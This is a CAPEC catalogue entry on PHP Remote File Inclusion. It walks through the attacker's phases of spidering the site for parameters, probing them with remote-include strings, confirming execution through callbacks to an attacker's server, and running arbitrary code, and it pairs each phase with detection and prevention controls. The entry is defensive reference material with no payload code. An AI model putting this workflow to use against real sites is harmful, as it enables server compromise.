CAPEC-193 - PHP Remote File Inclusion

In this pattern the attacker is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized "include" or "require" call, which the user can then control to point to any web-accessible file. This allows attackers to hijack the targeted application and force it to execute their own instructions.

Severity

Likelihood

Confidentiality

Integrity

Availability

  • Attack Methods 1
  • Injection
  • Purposes 2
  • Exploitation
  • Penetration
  • Scopes 7
  • Modify files or directories
  • Integrity
  • Read files or directories
  • Confidentiality
  • Modify application data
  • Integrity
  • Read application data
  • Confidentiality
  • Execute unauthorized code or commands
  • Authorization
  • Gain privileges / assume identity
  • Non-Repudiation
  • Authorization
  • Authentication
  • Accountability
  • Bypass protection mechanism
  • Authorization
  • Access_Control

Low level: To inject the malicious payload in a web page

Medium level: To bypass filters in the application

Target application server must allow remote files to be included in the "require", "include", etc. PHP directives

Ability to send HTTP request to a web application Ability to store PHP scripts on a server

Step 1 - Survey application

Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds..

Tecnique ID: 1 - Environment(s) env-Web

Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.

Tecnique ID: 2 - Environment(s) env-Web

Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.

Tecnique ID: 3 - Environment(s) env-Web

Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Indicator ID: 1 - Environment(s) env-Web

Type: Positive

URL parameters are used by the application

Indicator ID: 2 - Environment(s) env-Web

Type: Inconclusive

Using URL rewriting, parameters may be part of the URL path.

Indicator ID: 3 - Environment(s) env-Web

Type: Inconclusive

No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided.

Indicator ID: 4 - Environment(s) env-Web

Type: Negative

Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.


Security Control ID: 1

Type: Detective

Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).

Security Control ID: 2

Type: Detective

Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.

Security Control ID: 3

Type: Preventative

Use CAPTCHA to prevent the use of the application by an automated tool.

Security Control ID: 4

Type: Preventative

Actively monitor the application and either deny or redirect requests from origins that appear to be automated.


Outcome ID: 1

Type: Success

A list of URLs, with their corresponding parameters is created by the attacker.



Step 1 - Attempt variations on input parameters

The attack variants make use of a remotely available PHP script that generates a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, an attacker requests variations on the inputs he surveyed before. He sends parameters that include variations of payloads which include a reference to the remote PHP script. He records all the responses from the server that include the output of the execution of remote PHP script..

Tecnique ID: 1 - Environment(s) env-Web

Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads which include a reference to the attackers' controlled remote PHP script.

Tecnique ID: 2 - Environment(s) env-Web

Use a proxy tool to record results of manual input of remote file inclusion probes in known URLs.

Indicator ID: 1 - Environment(s) env-Web

Type: Positive

The output of the remote PHP script is included in the response web page.

Indicator ID: 2 - Environment(s) env-Web

Type: Inconclusive

Nothing is returned to the web page. The payload script might have been executed in a different context which wouldn't be included in the response web page

Indicator ID: 3 - Environment(s) env-All

Type: Negative

The application returns an error associated with the inclusion of remote file.

Indicator ID: 4 - Environment(s) env-All

Type: Negative

The application server doesn't download the remote PHP script.


Security Control ID: 1

Type: Detective

Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard Remote File Inclusion (RFI) probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.

Security Control ID: 2

Type: Preventative

Apply appropriate input validation to filter all user-controllable input

Security Control ID: 3

Type: Preventative

When possible, configure the PHP runtime environment to prevent the execution of remote PHP scripts

Security Control ID: 4

Type: Preventative

Actively monitor the application and either deny or redirect requests from origins that appear to be generating RFI probes.

Security Control ID: 5

Type: Preventative

When possible, only use the "include", "require", etc. PHP directives with statically define strings


Outcome ID: 1

Type: Success

The attacker's script is being executed on the application server and an output is being delivered at some point in the web site (if not on the same web page)

Outcome ID: 2

Type: Inconclusive

The remote PHP script doesn't appear to have been executed by the application server. It is possible to create behaviors to monitor the execution such as, for example, the remote PHP script tries to make an HTTP request to an attacker controlled web server, and therefore if the remote PHP script is executed on the application server, the attacker would have evidence in the access log file of his web server.

Outcome ID: 3

Type: Failure

No access to the remote PHP script has been recorded to the access log file of the web server hosting this script



Step 1 - Run arbitrary server-side code

As the attacker succeeds in exploiting the vulnerability, he is able to execute server-side code within the application. The malicious code has virtual access to the same resources as the targeted application. Note that the attacker might include shell code in his script and execute commands on the server under the same privileges as the PHP runtime is running with..

Tecnique ID: 1 - Environment(s) env-All

Develop malicious PHP script that is injected through vectors identified during the Experiment Phase and executed by the application server to execute a custom PHP script.

Security Control ID: 1

Type: Detective

Monitor server logs for parameters containing URL with references to remote content

Security Control ID: 2

Type: Preventative

Apply appropriate input validation to filter all user-controllable input

Security Control ID: 3

Type: Preventative

When possible, configure the PHP runtime environment to prevent the execution of remote PHP scripts

Security Control ID: 4

Type: Preventative

When possible, only use the "include", "require", etc. PHP directives with statically define strings


Outcome ID: 1

Type: Success

The attacker's script is being executed on the application server



Implementation: Perform input validation for all remote content, including remote and user-generated content

Implementation: Only allow known files to be included (whitelist)

Implementation: Make use of indirect references passed in URL parameters instead of file names

Configuration: Ensure that remote scripts cannot be include in the "include" or "require" PHP directives